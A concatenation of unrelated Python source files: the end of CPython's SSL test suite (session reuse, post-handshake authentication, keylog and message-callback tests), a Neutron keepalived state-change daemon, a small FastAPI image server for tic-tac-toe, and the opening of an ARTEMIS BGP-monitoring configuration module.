'SSLV3_ALERT_HANDSHAKE_FAILURE')
self.assertEqual(catch.unraisable.exc_type, ZeroDivisionError)
@needs_sni
def test_sni_callback_wrong_return_type(self):
# Returning the wrong return type terminates the TLS connection
# with an internal error alert.
server_context, other_context, client_context = self.sni_contexts()
def cb_wrong_return_type(ssl_sock, server_name, initial_context):
return "foo"
server_context.set_servername_callback(cb_wrong_return_type)
with support.catch_unraisable_exception() as catch:
with self.assertRaises(ssl.SSLError) as cm:
stats = server_params_test(client_context, server_context,
chatty=False,
sni_name='supermessage')
self.assertEqual(cm.exception.reason, 'TLSV1_ALERT_INTERNAL_ERROR')
self.assertEqual(catch.unraisable.exc_type, TypeError)
def test_shared_ciphers(self):
client_context, server_context, hostname = testing_context()
client_context.set_ciphers("AES128:AES256")
server_context.set_ciphers("AES256")
expected_algs = [
"AES256", "AES-256",
# TLS 1.3 ciphers are always enabled
"TLS_CHACHA20", "TLS_AES",
]
stats = server_params_test(client_context, server_context,
sni_name=hostname)
ciphers = stats['server_shared_ciphers'][0]
self.assertGreater(len(ciphers), 0)
for name, tls_version, bits in ciphers:
if not any(alg in name for alg in expected_algs):
self.fail(name)
def test_read_write_after_close_raises_valuerror(self):
client_context, server_context, hostname = testing_context()
server = ThreadedEchoServer(context=server_context, chatty=False)
with server:
s = client_context.wrap_socket(socket.socket(),
server_hostname=hostname)
s.connect((HOST, server.port))
s.close()
self.assertRaises(ValueError, s.read, 1024)
self.assertRaises(ValueError, s.write, b'hello')
def test_sendfile(self):
TEST_DATA = b"x" * 512
with open(support.TESTFN, 'wb') as f:
f.write(TEST_DATA)
self.addCleanup(support.unlink, support.TESTFN)
context = ssl.SSLContext(ssl.PROTOCOL_TLS)
context.verify_mode = ssl.CERT_REQUIRED
context.load_verify_locations(SIGNING_CA)
context.load_cert_chain(SIGNED_CERTFILE)
server = ThreadedEchoServer(context=context, chatty=False)
with server:
with context.wrap_socket(socket.socket()) as s:
s.connect((HOST, server.port))
with open(support.TESTFN, 'rb') as file:
s.sendfile(file)
self.assertEqual(s.recv(1024), TEST_DATA)
def test_session(self):
client_context, server_context, hostname = testing_context()
# TODO: sessions aren't compatible with TLSv1.3 yet
client_context.options |= ssl.OP_NO_TLSv1_3
# first connection without session
stats = server_params_test(client_context, server_context,
sni_name=hostname)
session = stats['session']
self.assertTrue(session.id)
self.assertGreater(session.time, 0)
self.assertGreater(session.timeout, 0)
self.assertTrue(session.has_ticket)
if ssl.OPENSSL_VERSION_INFO > (1, 0, 1):
self.assertGreater(session.ticket_lifetime_hint, 0)
self.assertFalse(stats['session_reused'])
sess_stat = server_context.session_stats()
self.assertEqual(sess_stat['accept'], 1)
self.assertEqual(sess_stat['hits'], 0)
# reuse session
stats = server_params_test(client_context, server_context,
session=session, sni_name=hostname)
sess_stat = server_context.session_stats()
self.assertEqual(sess_stat['accept'], 2)
self.assertEqual(sess_stat['hits'], 1)
self.assertTrue(stats['session_reused'])
session2 = stats['session']
self.assertEqual(session2.id, session.id)
self.assertEqual(session2, session)
self.assertIsNot(session2, session)
self.assertGreaterEqual(session2.time, session.time)
self.assertGreaterEqual(session2.timeout, session.timeout)
# another one without session
stats = server_params_test(client_context, server_context,
sni_name=hostname)
self.assertFalse(stats['session_reused'])
session3 = stats['session']
self.assertNotEqual(session3.id, session.id)
self.assertNotEqual(session3, session)
sess_stat = server_context.session_stats()
self.assertEqual(sess_stat['accept'], 3)
self.assertEqual(sess_stat['hits'], 1)
# reuse session again
stats = server_params_test(client_context, server_context,
session=session, sni_name=hostname)
self.assertTrue(stats['session_reused'])
session4 = stats['session']
self.assertEqual(session4.id, session.id)
self.assertEqual(session4, session)
self.assertGreaterEqual(session4.time, session.time)
self.assertGreaterEqual(session4.timeout, session.timeout)
sess_stat = server_context.session_stats()
self.assertEqual(sess_stat['accept'], 4)
self.assertEqual(sess_stat['hits'], 2)
def test_session_handling(self):
client_context, server_context, hostname = testing_context()
client_context2, _, _ = testing_context()
# TODO: session reuse does not work with TLSv1.3
client_context.options |= ssl.OP_NO_TLSv1_3
client_context2.options |= ssl.OP_NO_TLSv1_3
server = ThreadedEchoServer(context=server_context, chatty=False)
with server:
with client_context.wrap_socket(socket.socket(),
server_hostname=hostname) as s:
# session is None before handshake
self.assertEqual(s.session, None)
self.assertEqual(s.session_reused, None)
s.connect((HOST, server.port))
session = s.session
self.assertTrue(session)
with self.assertRaises(TypeError) as e:
s.session = object
self.assertEqual(str(e.exception), 'Value is not a SSLSession.')
with client_context.wrap_socket(socket.socket(),
server_hostname=hostname) as s:
s.connect((HOST, server.port))
# cannot set session after handshake
with self.assertRaises(ValueError) as e:
s.session = session
self.assertEqual(str(e.exception),
'Cannot set session after handshake.')
with client_context.wrap_socket(socket.socket(),
server_hostname=hostname) as s:
# can set session before handshake and before the
# connection was established
s.session = session
s.connect((HOST, server.port))
self.assertEqual(s.session.id, session.id)
self.assertEqual(s.session, session)
self.assertEqual(s.session_reused, True)
with client_context2.wrap_socket(socket.socket(),
server_hostname=hostname) as s:
# cannot re-use session with a different SSLContext
with self.assertRaises(ValueError) as e:
s.session = session
s.connect((HOST, server.port))
self.assertEqual(str(e.exception),
'Session refers to a different SSLContext.')
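# A hedged sketch (not part of the suite) of the client-side session reuse
# pattern exercised by test_session_handling above: capture SSLSocket.session
# from a first connection and assign it to a fresh socket created from the
# same SSLContext before connecting. The helper name, host and port are
# illustrative assumptions.
def _example_reuse_session(ctx, host='example.invalid', port=443):
    with ctx.wrap_socket(socket.socket(), server_hostname=host) as s1:
        s1.connect((host, port))
        session = s1.session          # captured after the first handshake
    with ctx.wrap_socket(socket.socket(), server_hostname=host) as s2:
        s2.session = session          # must be set before connect/handshake
        s2.connect((host, port))
        return s2.session_reused      # True when the server resumed it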
@unittest.skipUnless(ssl.HAS_TLSv1_3, "Test needs TLS 1.3")
class TestPostHandshakeAuth(unittest.TestCase):
def test_pha_setter(self):
protocols = [
ssl.PROTOCOL_TLS, ssl.PROTOCOL_TLS_SERVER, ssl.PROTOCOL_TLS_CLIENT
]
for protocol in protocols:
ctx = ssl.SSLContext(protocol)
self.assertEqual(ctx.post_handshake_auth, False)
ctx.post_handshake_auth = True
self.assertEqual(ctx.post_handshake_auth, True)
ctx.verify_mode = ssl.CERT_REQUIRED
self.assertEqual(ctx.verify_mode, ssl.CERT_REQUIRED)
self.assertEqual(ctx.post_handshake_auth, True)
ctx.post_handshake_auth = False
self.assertEqual(ctx.verify_mode, ssl.CERT_REQUIRED)
self.assertEqual(ctx.post_handshake_auth, False)
ctx.verify_mode = ssl.CERT_OPTIONAL
ctx.post_handshake_auth = True
self.assertEqual(ctx.verify_mode, ssl.CERT_OPTIONAL)
self.assertEqual(ctx.post_handshake_auth, True)
def test_pha_required(self):
client_context, server_context, hostname = testing_context()
server_context.post_handshake_auth = True
server_context.verify_mode = ssl.CERT_REQUIRED
client_context.post_handshake_auth = True
client_context.load_cert_chain(SIGNED_CERTFILE)
server = ThreadedEchoServer(context=server_context, chatty=False)
with server:
with client_context.wrap_socket(socket.socket(),
server_hostname=hostname) as s:
s.connect((HOST, server.port))
s.write(b'HASCERT')
self.assertEqual(s.recv(1024), b'FALSE\n')
s.write(b'PHA')
self.assertEqual(s.recv(1024), b'OK\n')
s.write(b'HASCERT')
self.assertEqual(s.recv(1024), b'TRUE\n')
# PHA method just returns true when cert is already available
s.write(b'PHA')
self.assertEqual(s.recv(1024), b'OK\n')
s.write(b'GETCERT')
cert_text = s.recv(4096).decode('us-ascii')
self.assertIn('Python Software Foundation CA', cert_text)
def test_pha_required_nocert(self):
client_context, server_context, hostname = testing_context()
server_context.post_handshake_auth = True
server_context.verify_mode = ssl.CERT_REQUIRED
client_context.post_handshake_auth = True
server = ThreadedEchoServer(context=server_context, chatty=False)
with server:
with client_context.wrap_socket(socket.socket(),
server_hostname=hostname) as s:
s.connect((HOST, server.port))
s.write(b'PHA')
# receive CertificateRequest
self.assertEqual(s.recv(1024), b'OK\n')
# send empty Certificate + Finish
s.write(b'HASCERT')
# receive alert
with self.assertRaisesRegex(
ssl.SSLError,
'tlsv13 alert certificate required'):
s.recv(1024)
def test_pha_optional(self):
if support.verbose:
sys.stdout.write("\n")
client_context, server_context, hostname = testing_context()
server_context.post_handshake_auth = True
server_context.verify_mode = ssl.CERT_REQUIRED
client_context.post_handshake_auth = True
client_context.load_cert_chain(SIGNED_CERTFILE)
# check CERT_OPTIONAL
server_context.verify_mode = ssl.CERT_OPTIONAL
server = ThreadedEchoServer(context=server_context, chatty=False)
with server:
with client_context.wrap_socket(socket.socket(),
server_hostname=hostname) as s:
s.connect((HOST, server.port))
s.write(b'HASCERT')
self.assertEqual(s.recv(1024), b'FALSE\n')
s.write(b'PHA')
self.assertEqual(s.recv(1024), b'OK\n')
s.write(b'HASCERT')
self.assertEqual(s.recv(1024), b'TRUE\n')
def test_pha_optional_nocert(self):
if support.verbose:
sys.stdout.write("\n")
client_context, server_context, hostname = testing_context()
server_context.post_handshake_auth = True
server_context.verify_mode = ssl.CERT_OPTIONAL
client_context.post_handshake_auth = True
server = ThreadedEchoServer(context=server_context, chatty=False)
with server:
with client_context.wrap_socket(socket.socket(),
server_hostname=hostname) as s:
s.connect((HOST, server.port))
s.write(b'HASCERT')
self.assertEqual(s.recv(1024), b'FALSE\n')
s.write(b'PHA')
self.assertEqual(s.recv(1024), b'OK\n')
# optional doesn't fail when client does not have a cert
s.write(b'HASCERT')
self.assertEqual(s.recv(1024), b'FALSE\n')
def test_pha_no_pha_client(self):
client_context, server_context, hostname = testing_context()
server_context.post_handshake_auth = True
server_context.verify_mode = ssl.CERT_REQUIRED
client_context.load_cert_chain(SIGNED_CERTFILE)
server = ThreadedEchoServer(context=server_context, chatty=False)
with server:
with client_context.wrap_socket(socket.socket(),
server_hostname=hostname) as s:
s.connect((HOST, server.port))
with self.assertRaisesRegex(ssl.SSLError, 'not server'):
s.verify_client_post_handshake()
s.write(b'PHA')
self.assertIn(b'extension not received', s.recv(1024))
def test_pha_no_pha_server(self):
# server doesn't have PHA enabled, cert is requested in handshake
client_context, server_context, hostname = testing_context()
server_context.verify_mode = ssl.CERT_REQUIRED
client_context.post_handshake_auth = True
client_context.load_cert_chain(SIGNED_CERTFILE)
server = ThreadedEchoServer(context=server_context, chatty=False)
with server:
with client_context.wrap_socket(socket.socket(),
server_hostname=hostname) as s:
s.connect((HOST, server.port))
s.write(b'HASCERT')
self.assertEqual(s.recv(1024), b'TRUE\n')
# PHA doesn't fail if there is already a cert
s.write(b'PHA')
self.assertEqual(s.recv(1024), b'OK\n')
s.write(b'HASCERT')
self.assertEqual(s.recv(1024), b'TRUE\n')
def test_pha_not_tls13(self):
# TLS 1.2
client_context, server_context, hostname = testing_context()
server_context.verify_mode = ssl.CERT_REQUIRED
client_context.maximum_version = ssl.TLSVersion.TLSv1_2
client_context.post_handshake_auth = True
client_context.load_cert_chain(SIGNED_CERTFILE)
server = ThreadedEchoServer(context=server_context, chatty=False)
with server:
with client_context.wrap_socket(socket.socket(),
server_hostname=hostname) as s:
s.connect((HOST, server.port))
# PHA fails for TLS != 1.3
s.write(b'PHA')
self.assertIn(b'WRONG_SSL_VERSION', s.recv(1024))
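# A minimal sketch (not part of the suite) of the context knobs that
# post-handshake authentication needs, as exercised by the tests above.
# Constructing the contexts is side-effect free, but the post_handshake_auth
# attribute assumes OpenSSL 1.1.1+; the helper name is hypothetical.
def _example_pha_contexts():
    client = ssl.SSLContext(ssl.PROTOCOL_TLS_CLIENT)
    client.post_handshake_auth = True       # client must opt in to PHA
    server = ssl.SSLContext(ssl.PROTOCOL_TLS_SERVER)
    server.post_handshake_auth = True       # server may request a cert later
    server.verify_mode = ssl.CERT_REQUIRED  # post-handshake request is strict
    return client, server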
HAS_KEYLOG = hasattr(ssl.SSLContext, 'keylog_filename')
requires_keylog = unittest.skipUnless(
HAS_KEYLOG, 'test requires OpenSSL 1.1.1 with keylog callback')
class TestSSLDebug(unittest.TestCase):
def keylog_lines(self, fname=support.TESTFN):
with open(fname) as f:
return len(list(f))
@requires_keylog
def test_keylog_defaults(self):
self.addCleanup(support.unlink, support.TESTFN)
ctx = ssl.SSLContext(ssl.PROTOCOL_TLS_CLIENT)
self.assertEqual(ctx.keylog_filename, None)
self.assertFalse(os.path.isfile(support.TESTFN))
ctx.keylog_filename = support.TESTFN
self.assertEqual(ctx.keylog_filename, support.TESTFN)
self.assertTrue(os.path.isfile(support.TESTFN))
self.assertEqual(self.keylog_lines(), 1)
ctx.keylog_filename = None
self.assertEqual(ctx.keylog_filename, None)
with self.assertRaises((IsADirectoryError, PermissionError)):
# Windows raises PermissionError
ctx.keylog_filename = os.path.dirname(
os.path.abspath(support.TESTFN))
with self.assertRaises(TypeError):
ctx.keylog_filename = 1
@requires_keylog
def test_keylog_filename(self):
self.addCleanup(support.unlink, support.TESTFN)
client_context, server_context, hostname = testing_context()
client_context.keylog_filename = support.TESTFN
server = ThreadedEchoServer(context=server_context, chatty=False)
with server:
with client_context.wrap_socket(socket.socket(),
server_hostname=hostname) as s:
s.connect((HOST, server.port))
# header, 5 lines for TLS 1.3
self.assertEqual(self.keylog_lines(), 6)
client_context.keylog_filename = None
server_context.keylog_filename = support.TESTFN
server = ThreadedEchoServer(context=server_context, chatty=False)
with server:
with client_context.wrap_socket(socket.socket(),
server_hostname=hostname) as s:
s.connect((HOST, server.port))
self.assertGreaterEqual(self.keylog_lines(), 11)
client_context.keylog_filename = support.TESTFN
server_context.keylog_filename = support.TESTFN
server = ThreadedEchoServer(context=server_context, chatty=False)
with server:
with client_context.wrap_socket(socket.socket(),
server_hostname=hostname) as s:
s.connect((HOST, server.port))
self.assertGreaterEqual(self.keylog_lines(), 21)
client_context.keylog_filename = None
server_context.keylog_filename = None
@requires_keylog
@unittest.skipIf(sys.flags.ignore_environment,
"test is not compatible with ignore_environment")
def test_keylog_env(self):
self.addCleanup(support.unlink, support.TESTFN)
with unittest.mock.patch.dict(os.environ):
os.environ['SSLKEYLOGFILE'] = support.TESTFN
self.assertEqual(os.environ['SSLKEYLOGFILE'], support.TESTFN)
ctx = ssl.SSLContext(ssl.PROTOCOL_TLS_CLIENT)
self.assertEqual(ctx.keylog_filename, None)
ctx = ssl.create_default_context()
self.assertEqual(ctx.keylog_filename, support.TESTFN)
ctx = ssl._create_stdlib_context()
self.assertEqual(ctx.keylog_filename, support.TESTFN)
def test_msg_callback(self):
client_context, server_context, hostname = testing_context()
def msg_cb(conn, direction, version, content_type, msg_type, data):
pass
self.assertIs(client_context._msg_callback, None)
client_context._msg_callback = msg_cb
self.assertIs(client_context._msg_callback, msg_cb)
with self.assertRaises(TypeError):
client_context._msg_callback = object()
def test_msg_callback_tls12(self):
client_context, server_context, hostname = testing_context()
client_context.options |= ssl.OP_NO_TLSv1_3
msg = []
def msg_cb(conn, direction, version, content_type, msg_type, data):
self.assertIsInstance(conn, ssl.SSLSocket)
self.assertIsInstance(data, bytes)
self.assertIn(direction, {'read', 'write'})
msg.append((direction, version, content_type, msg_type))
client_context._msg_callback = msg_cb
server = ThreadedEchoServer(context=server_context, chatty=False)
with server:
with client_context.wrap_socket(socket.socket(),
server_hostname=hostname) as s:
s.connect((HOST, server.port))
self.assertEqual(msg, [
("write", TLSVersion.TLSv1, _TLSContentType.HEADER,
_TLSMessageType.CERTIFICATE_STATUS),
("write", TLSVersion.TLSv1_2, _TLSContentType.HANDSHAKE,
_TLSMessageType.CLIENT_HELLO),
("read", TLSVersion.TLSv1_2, _TLSContentType.HEADER,
_TLSMessageType.CERTIFICATE_STATUS),
("read", TLSVersion.TLSv1_2, _TLSContentType.HANDSHAKE,
_TLSMessageType.SERVER_HELLO),
("read", TLSVersion.TLSv1_2, _TLSContentType.HEADER,
_TLSMessageType.CERTIFICATE_STATUS),
("read", TLSVersion.TLSv1_2, _TLSContentType.HANDSHAKE,
_TLSMessageType.CERTIFICATE),
("read", TLSVersion.TLSv1_2, _TLSContentType.HEADER,
_TLSMessageType.CERTIFICATE_STATUS),
("read", TLSVersion.TLSv1_2, _TLSContentType.HANDSHAKE,
_TLSMessageType.SERVER_KEY_EXCHANGE),
("read", TLSVersion.TLSv1_2, _TLSContentType.HEADER,
_TLSMessageType.CERTIFICATE_STATUS),
("read", TLSVersion.TLSv1_2, _TLSContentType.HANDSHAKE,
_TLSMessageType.SERVER_DONE),
("write", TLSVersion.TLSv1_2, _TLSContentType.HEADER,
_TLSMessageType.CERTIFICATE_STATUS),
("write", TLSVersion.TLSv1_2, _TLSContentType.HANDSHAKE,
_TLSMessageType.CLIENT_KEY_EXCHANGE),
("write", TLSVersion.TLSv1_2, _TLSContentType.HEADER,
_TLSMessageType.FINISHED),
("write", TLSVersion.TLSv1_2, _TLSContentType.CHANGE_CIPHER_SPEC,
_TLSMessageType.CHANGE_CIPHER_SPEC),
("write", TLSVersion.TLSv1_2, _TLSContentType.HEADER,
_TLSMessageType.CERTIFICATE_STATUS),
("write", TLSVersion.TLSv1_2, _TLSContentType.HANDSHAKE,
_TLSMessageType.FINISHED),
("read", TLSVersion.TLSv1_2, _TLSContentType.HEADER,
_TLSMessageType.CERTIFICATE_STATUS),
("read", TLSVersion.TLSv1_2, _TLSContentType.HANDSHAKE,
_TLSMessageType.NEWSESSION_TICKET),
("read", TLSVersion.TLSv1_2, _TLSContentType.HEADER,
_TLSMessageType.FINISHED),
("read", TLSVersion.TLSv1_2, _TLSContentType.HEADER,
_TLSMessageType.CERTIFICATE_STATUS),
("read", TLSVersion.TLSv1_2, _TLSContentType.HANDSHAKE,
_TLSMessageType.FINISHED),
])
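# Illustrative only: the shape of a message callback as used in the tests
# above. _msg_callback is a private CPython debugging hook rather than a
# stable API, and the helper name is hypothetical.
def _example_attach_msg_callback(ctx):
    def msg_cb(conn, direction, version, content_type, msg_type, data):
        # One line per TLS record/handshake message seen on the socket.
        print(direction, version, content_type, msg_type, len(data))
    ctx._msg_callback = msg_cb
    return ctx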
def test_main(verbose=False):
if support.verbose:
import warnings
plats = {
'Mac': platform.mac_ver,
'Windows': platform.win32_ver,
}
for name, func in plats.items():
plat = func()
if plat and plat[0]:
plat = '%s %r' % (name, plat)
break
else:
plat = repr(platform.platform())
print("test_ssl: testing with %r %r" %
(ssl.OPENSSL_VERSION, ssl.OPENSSL_VERSION_INFO))
print(" under %s" % plat)
print(" HAS_SNI = %r" % ssl.HAS_SNI)
print(" OP_ALL = 0x%8x" % ssl.OP_ALL)
try:
print(" OP_NO_TLSv1_1 = 0x%8x" % ssl.OP_NO_TLSv1_1)
except AttributeError:
pass
for filename in [
CERTFILE, BYTES_CERTFILE,
ONLYCERT, ONLYKEY, BYTES_ONLYCERT, BYTES_ONLYKEY,
SIGNED_CERTFILE, SIGNED_CERTFILE2, SIGNING_CA,
BADCERT, BADKEY, EMPTYCERT]:
if not os.path.exists(filename):
raise support.TestFailed("Can't read certificate file %r" % filename)
tests = [
ContextTests, BasicSocketTests, SSLErrorTests, MemoryBIOTests,
SSLObjectTests, SimpleBackgroundTests, ThreadedTests,
TestPostHandshakeAuth, TestSSLDebug
]
if support.is_resource_enabled('network'):
tests.append(NetworkedTests)
thread_info = support.threading_setup()
try:
support.run_unittest(*tests)
finally:
support.threading_cleanup(*thread_info)
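# A self-contained sketch of the TLSVersion pinning pattern used in
# test_min_max_version: building the context is side-effect free, but the
# minimum_version/maximum_version attributes assume OpenSSL 1.1.0g+.
def _example_pin_tls12():
    ctx = ssl.SSLContext(ssl.PROTOCOL_TLS_CLIENT)
    # Restrict negotiation to exactly TLS 1.2, as the server context does
    # in the min/max tests above.
    ctx.minimum_version = ssl.TLSVersion.TLSv1_2
    ctx.maximum_version = ssl.TLSVersion.TLSv1_2
    return ctx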
if __name__ == "__main__":
test_main()
|
keepalived_state_change.py
|
# Copyright (c) 2015 Red Hat Inc.
#
# Licensed under the Apache License, Version 2.0 (the "License"); you may
# not use this file except in compliance with the License. You may obtain
# a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS, WITHOUT
# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the
# License for the specific language governing permissions and limitations
# under the License.
import os
import queue
import sys
import threading
import httplib2
from oslo_config import cfg
from oslo_log import log as logging
from neutron._i18n import _
from neutron.agent.l3 import ha
from neutron.agent.linux import daemon
from neutron.agent.linux import ip_lib
from neutron.agent.linux import utils as agent_utils
from neutron.common import config
from neutron.common import utils as common_utils
from neutron.conf.agent.l3 import keepalived
from neutron import privileged
LOG = logging.getLogger(__name__)
INITIAL_STATE_READ_TIMEOUT = 10
class KeepalivedUnixDomainConnection(agent_utils.UnixDomainHTTPConnection):
def __init__(self, *args, **kwargs):
        # Old-style super initialization is required!
agent_utils.UnixDomainHTTPConnection.__init__(
self, *args, **kwargs)
self.socket_path = (
ha.L3AgentKeepalivedStateChangeServer.
get_keepalived_state_change_socket_path(cfg.CONF))
class MonitorDaemon(daemon.Daemon):
def __init__(self, pidfile, router_id, user, group, namespace, conf_dir,
interface, cidr):
self.router_id = router_id
self.namespace = namespace
self.conf_dir = conf_dir
self.interface = interface
self.cidr = cidr
self.monitor = None
self.event_stop = threading.Event()
self.event_started = threading.Event()
self.queue = queue.Queue()
self._initial_state = None
super(MonitorDaemon, self).__init__(pidfile, uuid=router_id,
user=user, group=group)
@property
def initial_state(self):
return self._initial_state
@initial_state.setter
def initial_state(self, state):
if not self._initial_state:
LOG.debug('Initial status of router %s is %s', self.router_id,
state)
self._initial_state = state
def run(self):
self._thread_initial_state = threading.Thread(
target=self.handle_initial_state)
self._thread_ip_monitor = threading.Thread(
target=ip_lib.ip_monitor,
args=(self.namespace, self.queue, self.event_stop,
self.event_started))
self._thread_read_queue = threading.Thread(
target=self.read_queue,
args=(self.queue, self.event_stop, self.event_started))
self._thread_initial_state.start()
self._thread_ip_monitor.start()
self._thread_read_queue.start()
        # NOTE(ralonsoh): if the initial status is not read within the
        # defined timeout, the "backup" state is set.
self._thread_initial_state.join(timeout=INITIAL_STATE_READ_TIMEOUT)
if not self.initial_state:
LOG.warning('Timeout reading the initial status of router %s, '
'state is set to "backup".', self.router_id)
self.write_state_change('backup')
self.notify_agent('backup')
self._thread_read_queue.join()
def read_queue(self, _queue, event_stop, event_started):
event_started.wait()
while not event_stop.is_set():
try:
event = _queue.get(timeout=2)
except queue.Empty:
event = None
if not event:
continue
if event['name'] == self.interface and event['cidr'] == self.cidr:
if event['event'] == 'added':
new_state = 'primary'
else:
new_state = 'backup'
self.write_state_change(new_state)
self.notify_agent(new_state)
def handle_initial_state(self):
try:
state = 'backup'
cidr = common_utils.ip_to_cidr(self.cidr)
# NOTE(ralonsoh): "get_devices_with_ip" without passing an IP
# address performs one single pyroute2 command. Because the number
# of interfaces in the namespace is reduced, this is faster.
for address in ip_lib.get_devices_with_ip(self.namespace):
if (address['name'] == self.interface and
address['cidr'] == cidr):
state = 'primary'
break
if not self.initial_state:
self.write_state_change(state)
self.notify_agent(state)
except Exception:
if not self.initial_state:
LOG.exception('Failed to get initial status of router %s',
self.router_id)
def write_state_change(self, state):
self.initial_state = state
with open(os.path.join(
self.conf_dir, 'state'), 'w') as state_file:
state_file.write(state)
LOG.debug('Wrote router %s state %s', self.router_id, state)
def notify_agent(self, state):
resp, content = httplib2.Http().request(
# Note that the message is sent via a Unix domain socket so that
# the URL doesn't matter.
'http://127.0.0.1/',
headers={'X-Neutron-Router-Id': self.router_id,
'X-Neutron-State': state,
'Connection': 'close'},
connection_type=KeepalivedUnixDomainConnection)
if resp.status != 200:
raise Exception(_('Unexpected response: %s') % resp)
LOG.debug('Notified agent router %s, state %s', self.router_id, state)
def handle_sigterm(self, signum, frame):
self.event_stop.set()
self._thread_read_queue.join(timeout=5)
super(MonitorDaemon, self).handle_sigterm(signum, frame)
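# Hedged illustration of the state mapping read_queue() applies to ip_monitor
# events: the VIP appearing on the monitored interface means this router is
# primary, its removal means backup. The event dict shape ({'name', 'cidr',
# 'event'}) is taken from the loop above; the helper itself is hypothetical.
def _event_to_state(event, interface, cidr):
    if event['name'] == interface and event['cidr'] == cidr:
        return 'primary' if event['event'] == 'added' else 'backup'
    return None  # event concerns another interface/address; ignore it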
def configure(conf):
config.register_common_config_options()
config.init(sys.argv[1:])
conf.set_override('log_dir', cfg.CONF.conf_dir)
conf.set_override('debug', True)
conf.set_override('use_syslog', True)
config.setup_logging()
privileged.default.set_client_mode(False)
def main():
keepalived.register_cli_l3_agent_keepalived_opts()
keepalived.register_l3_agent_keepalived_opts()
configure(cfg.CONF)
MonitorDaemon(cfg.CONF.pid_file,
cfg.CONF.router_id,
cfg.CONF.user,
cfg.CONF.group,
cfg.CONF.namespace,
cfg.CONF.conf_dir,
cfg.CONF.monitor_interface,
cfg.CONF.monitor_cidr).start()
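# For illustration only: notify_agent() above sends its HTTP request over a
# Unix domain socket via agent_utils.UnixDomainHTTPConnection. A minimal
# stdlib-only equivalent (an assumption about what that helper does, not
# Neutron code) looks roughly like this:
import http.client
import socket as pysocket
class _UnixHTTPConnection(http.client.HTTPConnection):
    """Hypothetical sketch: HTTP over an AF_UNIX stream socket."""
    def __init__(self, socket_path):
        super().__init__('127.0.0.1')  # host/port are ignored over AF_UNIX
        self._socket_path = socket_path
    def connect(self):
        self.sock = pysocket.socket(pysocket.AF_UNIX, pysocket.SOCK_STREAM)
        self.sock.connect(self._socket_path)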
|
__init__.py
|
import threading
from fastapi import FastAPI
from fastapi.responses import FileResponse
import uvicorn
app = FastAPI()
@app.get('/tictactoe/{gameID}')
async def getGameImage(gameID: str):
    folderPath = './modules/tic_tac_toe/src/tictactoe_images'
    imagePath = f'{folderPath}/{gameID}.png'
    # Serve the PNG itself; returning the bare path string would only
    # JSON-encode the path instead of sending the image.
    return FileResponse(imagePath)
def run():
    uvicorn.run(app, port=6060)
def createApp():
    # Start the API server in a daemon thread so it neither blocks the caller
    # nor keeps the process alive on shutdown.
    apiThread = threading.Thread(target=run, daemon=True)
    apiThread.start()
    return apiThread
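# Hypothetical usage sketch: once createApp() has started the server, a board
# image can be fetched over plain HTTP. The game ID below is made up, and the
# helper is not part of the module's API.
def _example_fetch(gameID: str) -> bytes:
    import urllib.request
    url = f'http://127.0.0.1:6060/tictactoe/{gameID}'
    with urllib.request.urlopen(url) as resp:
        return resp.read()  # raw PNG bytes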
|
configuration.py
|
import copy
import multiprocessing as mp
import os
import re
import shutil
import stat
import time
from io import StringIO
from ipaddress import ip_network as str2ip
from typing import Dict
from typing import List
from typing import NoReturn
from typing import Optional
from typing import Text
from typing import TextIO
from typing import Union
import redis
import requests
import ruamel.yaml
import ujson as json
from artemis_utils import ArtemisError
from artemis_utils import flatten
from artemis_utils import get_hash
from artemis_utils import get_logger
from artemis_utils import update_aliased_list
from artemis_utils.constants import AUTOIGNORE_HOST
from artemis_utils.constants import BGPSTREAMHISTTAP_HOST
from artemis_utils.constants import BGPSTREAMKAFKATAP_HOST
from artemis_utils.constants import BGPSTREAMLIVETAP_HOST
from artemis_utils.constants import DATABASE_HOST
from artemis_utils.constants import DETECTION_HOST
from artemis_utils.constants import EXABGPTAP_HOST
from artemis_utils.constants import MITIGATION_HOST
from artemis_utils.constants import NOTIFIER_HOST
from artemis_utils.constants import PREFIXTREE_HOST
from artemis_utils.constants import RIPERISTAP_HOST
from artemis_utils.envvars import IS_KUBERNETES
from artemis_utils.envvars import RABBITMQ_URI
from artemis_utils.envvars import REDIS_HOST
from artemis_utils.envvars import REDIS_PORT
from artemis_utils.envvars import REST_PORT
from artemis_utils.rabbitmq import create_exchange
from artemis_utils.rabbitmq import create_queue
from artemis_utils.redis import ping_redis
from artemis_utils.redis import redis_key
from artemis_utils.service import get_local_ip
from artemis_utils.service import service_to_ips_and_replicas_in_compose
from artemis_utils.service import service_to_ips_and_replicas_in_k8s
from artemis_utils.translations import translate_as_set
from artemis_utils.translations import translate_asn_range
from artemis_utils.translations import translate_rfc2622
from kombu import Connection
from kombu import Consumer
from kombu import Producer
from kombu import uuid
from kombu.mixins import ConsumerProducerMixin
from tornado.ioloop import IOLoop
from tornado.web import Application
from tornado.web import RequestHandler
# logger
log = get_logger()
# shared memory object locks
shared_memory_locks = {
"data_worker": mp.Lock(),
"config_data": mp.Lock(),
"ignore_fileobserver": mp.Lock(),
}
# global vars
SERVICE_NAME = "configuration"
ALL_CONFIGURABLE_SERVICES = [
SERVICE_NAME,
PREFIXTREE_HOST,
DATABASE_HOST,
NOTIFIER_HOST,
DETECTION_HOST,
MITIGATION_HOST,
RIPERISTAP_HOST,
BGPSTREAMLIVETAP_HOST,
BGPSTREAMKAFKATAP_HOST,
BGPSTREAMHISTTAP_HOST,
EXABGPTAP_HOST,
AUTOIGNORE_HOST,
]
MONITOR_SERVICES = [
RIPERISTAP_HOST,
BGPSTREAMLIVETAP_HOST,
BGPSTREAMKAFKATAP_HOST,
BGPSTREAMHISTTAP_HOST,
EXABGPTAP_HOST,
]
def read_conf(load_yaml=True, config_file=None):
ret_key = None
ret_conf = None
try:
r = requests.get("http://{}:{}/config".format(DATABASE_HOST, REST_PORT))
r_json = r.json()
if r_json["success"]:
if load_yaml:
ret_conf = ruamel.yaml.load(
r_json["raw_config"],
Loader=ruamel.yaml.RoundTripLoader,
preserve_quotes=True,
)
else:
ret_conf = r_json["raw_config"]
ret_key = r_json["key"]
elif config_file:
log.warning(
"could not get most recent configuration from DB, falling back to file"
)
with open(config_file, "r") as f:
raw = f.read()
if load_yaml:
ret_conf = ruamel.yaml.load(
raw, Loader=ruamel.yaml.RoundTripLoader, preserve_quotes=True
)
else:
ret_conf = raw
except Exception:
log.exception("exception")
finally:
return ret_key, ret_conf
